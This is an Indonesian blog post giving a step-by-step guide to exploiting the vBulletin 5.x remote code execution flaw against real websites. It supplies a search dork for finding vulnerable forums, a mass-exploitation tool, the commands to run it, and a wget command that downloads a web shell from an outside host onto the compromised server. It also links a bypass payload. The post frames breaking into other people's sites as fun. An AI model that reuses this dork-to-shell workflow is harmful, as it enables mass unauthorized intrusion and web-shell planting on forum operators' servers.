vBulletin forum 5.0.0 - 5.5.4 remote code execution

byMuhammad Rasyad -
0

Baca Juga

Selamat malam semuanya, hari ini w share exploit rce lagi karena ora rce ora Oce👊😎 yaitu vBulletin forum 5.0.0 - 5.5.4 remote code execution. Exploit ini hanya bisa pada vBulletin versi 5.x.x saja klu dibawah nya misal versi 4.x.x mungkin bisa juga pake teknik mata batin ala roy kimochi👊😭 oc langsung aja.

Dork:
intext:"Powered By vBulletin Version 5.5.4"
Tools exploiter: https://github.com/Frint0/mass-pwn-vbulletin

Dorking dlo yakan cari yg versi nya 5.0.0 - 5.4.4
$git clone https://github.com/Frint0/mass-pwn-vbulletin
$cd mass-pwn-vbulletin
$python2 exploit.py http://localhost/
Jika sudah kita ketik id atau uname -a terserah Kelen mainin commandnya
Jika seperti itu berarti bisa kita perkaos :D
Kita bisa langsung panggil shell nya atau klu mau kelen maenin sendiri command command nya hihi
Disini w langsung upload shellnya, caranya?
wget http://linkshell.com/shell.txt -O shell.php
Lalu cek apakah sudah terupload atau belum. Cara cek nya ketik ls
Yeap file aink (os.php) berhasil terupload muehehe
Langsung akses aj ykan (http://localhost/[path]/shell.php)
Selesai tinggal di perkosa aj webna.

UPDATE!
Bagi yg punya kendala blank pas execute command, simak cara bypass nya berikut.


Link get content ~> https://megagamarra.com/ngeue.txt
UPDATE LAGI BOS! Karena link get content nya mokat kalian bisa menggunakan tools buatan w di vBulletin Rce Auto Exploiter. Yg pasti bisa auto bepas shell na ok tq.



Tags

Muhammad Rasyad

I'm just an ordinary weeb who likes technology stuff and to learn about coding and cyber security

Anda mungkin menyukai postingan ini

Posting Komentar

Lebih baru Lebih lama